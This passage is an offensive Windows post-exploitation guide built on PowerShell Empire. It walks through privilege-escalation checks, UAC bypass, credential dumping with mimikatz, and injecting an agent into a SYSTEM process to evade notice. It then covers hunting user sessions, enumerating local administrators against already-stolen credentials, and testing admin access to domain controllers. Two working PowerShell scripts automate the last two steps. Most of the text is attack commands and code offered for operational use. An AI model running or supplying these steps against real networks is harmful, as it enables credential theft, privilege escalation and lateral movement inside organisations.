
 2. NETWORK ENUMERATION  

 Interacting with an agent  

(empire: ) > agents

(empire: ) > interact [agent-name]

 Using the powerup/allchecks module for privilege escalation  

( Run every PowerUp check to find local privilege-escalation paths; if the agent belongs to a local administrator but runs in a medium-integrity process, follow up with bypassuac )

(empire: agentname) > usemodule privesc/powerup/allchecks

(empire: agentname) > execute         ( review the output first: bypassuac only helps when the current user is a local administrator held back by UAC )

(empire: agentname) > bypassuac [name of listener]

[>] Module is not opsec safe, run [y/N]  > y

 

[if successful, a second agent checks in with an elevated (high-integrity) administrator token]

(empire: agentname) > back

(empire: agents) > list

 Getting password hashes and credentials (requires admin/SYSTEM privileges) 

(empire: agentname) > mimikatz

(empire: agentname) > creds          ( shows everything Empire has harvested so far, including the mimikatz results )

 Viewing Tokens on the local box  

(empire: agentname) > usemodule credentials/tokens

(empire: agentname) > info

(empire: agentname) > execute

------------------------------------------------------------------

Domain          username        processID

xxxxx           xxxx            512

------------------------------------------------------------------

 Injecting a PowerShell agent into another process to blend in with the environment  

(empire: agentname) > usemodule management/psinject

(empire: agentname) > info

(empire: agentname) > set ProcID [512]                 ( PID of the target process; pick a SYSTEM-owned process from the tokens listing so the new agent inherits that token )

(empire: agentname) > set listener [nameoflistener]

(empire: agentname) > execute

[if successful, a new agent checks in from inside the target process, running with that process's token]

 Finding out more about a particular user  

(empire: agentname) > usemodule situational_awareness/network/powerview/get_user

(empire: agentname) > info

(empire: agentname) > set UserName [nameofuser]                 (name of a user )

(empire: agentname) > execute

 Finding out where a user has active sessions on the network  

(empire: agentname) > usemodule situational_awareness/network/powerview/user_hunter

(empire: agentname) > info

(empire: agentname) > set UserName [nameofuser]                 (name of a user )

(empire: agentname) > execute

------------------------------------------------------------------

UserDomain      UserName        SessionFrom

xxxxx           xxxx            10.1.12.15

------------------------------------------------------------------

 Return a list of all current members of a specified local group on a local or remote host  

(empire: agentname) > usemodule situational_awareness/network/powerview/get_localgroup

(empire: agentname) > info

(empire: agentname) > set GroupName [nameofgroup]     ( name of the group, e.g. Administrators )

(empire: agentname) > set HostName [ipoftgt]                   ( IP address or hostname of the target )

(empire: agentname) > set Recurse True

(empire: agentname) > set Agent  [nameofagent]                              ( filled in with the current agent by default; set it only if empty )

(empire: agentname) > execute

 

------------------------------------------------------------------

Check whether any user you already hold credentials for is a member of the target's Administrators group; a match gives you an admin foothold on that host.

------------------------------------------------------------------
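The same local-group enumeration can be done without Empire from any PowerShell session the agent gives you. The block below is an added example, not code from the page, Empire or PowerView: it binds to the target's SAM over the WinNT ADSI provider (the mechanism PowerView's Get-NetLocalGroup also relies on), lists the members of a local group, optionally expands nested groups, and flags members that match a constructed list of accounts you already hold credentials for. The hostname, group and credential list are placeholders; reading a remote host's local groups requires a token that is a local administrator there and SMB/RPC reachability.

```powershell
# Added example (not part of the page, Empire or PowerView). Enumerates the members of a
# local group on a local or remote host via the WinNT ADSI provider, expanding nested groups
# on request. Assumes: SMB/RPC reachability and a token allowed to read the remote SAM.
function Get-LocalGroupMembership {
    [CmdletBinding()]
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [string]$GroupName    = 'Administrators',
        [switch]$Recurse
    )

    # Groups already expanded, so nested or circular membership cannot loop forever
    $seen = New-Object 'System.Collections.Generic.HashSet[string]'

    function Expand-Group([string]$AdsPath, [string]$Via) {
        if (-not $seen.Add($AdsPath.ToLower())) { return }
        try {
            $group   = [ADSI]$AdsPath
            $members = $group.psbase.Invoke('Members')
        } catch {
            Write-Warning "Could not read $AdsPath : $($_.Exception.Message)"
            return
        }
        foreach ($m in $members) {
            # Members come back as raw COM objects; read their properties by reflection
            $class = $m.GetType().InvokeMember('Class',   'GetProperty', $null, $m, $null)
            $path  = $m.GetType().InvokeMember('ADsPath', 'GetProperty', $null, $m, $null)
            # WinNT://DOMAIN/Name  ->  DOMAIN\Name
            $account = ($path -replace '^WinNT://', '') -replace '/', '\'
            [pscustomobject]@{
                ComputerName = $ComputerName
                GroupName    = $Via
                Member       = $account
                Class        = $class
            }
            if ($Recurse -and $class -eq 'Group') {
                Expand-Group -AdsPath "$path,group" -Via $account
            }
        }
    }

    Expand-Group -AdsPath "WinNT://$ComputerName/$GroupName,group" -Via $GroupName
}

# Usage with placeholder values: list the Administrators group on a target and mark
# members for which you already hold credentials (constructed list, not real accounts).
$knownCreds = @('CORP\svc_backup', 'CORP\jdoe')
Get-LocalGroupMembership -ComputerName 'TARGET-HOST' -GroupName 'Administrators' -Recurse |
    ForEach-Object {
        $_ | Add-Member -NotePropertyName HaveCreds -NotePropertyValue ($knownCreds -contains $_.Member) -PassThru
    } | Format-Table -AutoSize
```

Nested groups are followed by binding to each member's own ADsPath with the `,group` class suffix, which also resolves domain groups through the WinNT provider as long as a domain controller is reachable; the `$seen` set stops the walk if two groups contain each other.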

 Finding the domain controller 

(empire: agentname) > usemodule situational_awareness/network/powerview/get_domaincontroller

(empire: agentname) > execute

------------------------------------------------------------------

Name (FQDN)        Domain        IPAddress        OSVersion

------------------------------------------------------------------

(empire: agentname) > shell dir \\FQDN\c$               ( tests whether the current token has administrative access to the DC's C$ share )

[Result of dir ]
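The DC lookup and the C$ check above can be combined into one PowerShell routine run from the agent. This is an added example, not code from the page or from Empire: it uses the .NET System.DirectoryServices.ActiveDirectory classes to list the domain controllers of the current domain with the same fields get_domaincontroller reports (Name, Domain, IPAddress, OSVersion) and then attempts to list each DC's C$ share, recording success or the access error. It assumes the agent runs under a domain token on a host that can reach the DCs over SMB; the optional name filter is a placeholder.

```powershell
# Added example (not part of the page or of Empire). Locates the domain controllers of the
# current domain and tests whether the current token can list each DC's C$ admin share.
# Assumes: a domain token and SMB reachability to the DCs.
function Test-DomainControllerAdminShare {
    [CmdletBinding()]
    param(
        # Optional list of DC names to check; default is every DC in the current domain
        [string[]]$Name
    )

    $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

    foreach ($dc in $domain.DomainControllers) {
        if ($Name -and ($Name -notcontains $dc.Name)) { continue }

        $share   = "\\$($dc.Name)\C$"
        $canList = $false
        $err     = $null
        try {
            # Listing the C$ share requires local-admin rights on the DC, so success
            # means the current token is already an administrator there
            $null    = Get-ChildItem -LiteralPath $share -ErrorAction Stop
            $canList = $true
        } catch {
            $err = $_.Exception.Message
        }

        [pscustomobject]@{
            Name      = $dc.Name
            Domain    = $dc.Domain.Name
            IPAddress = $dc.IPAddress
            OSVersion = $dc.OSVersion
            Share     = $share
            CanListC  = $canList
            Error     = $err
        }
    }
}

# Usage: a CanListC value of True marks a DC on which the current token has admin access.
Test-DomainControllerAdminShare | Format-Table Name, IPAddress, OSVersion, CanListC, Error -AutoSize
```

An "Access is denied" error means the DC was reached but the token is not an administrator on it; a "network path was not found" error points at name resolution or SMB filtering rather than at permissions, so keep the two apart when deciding the next move.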
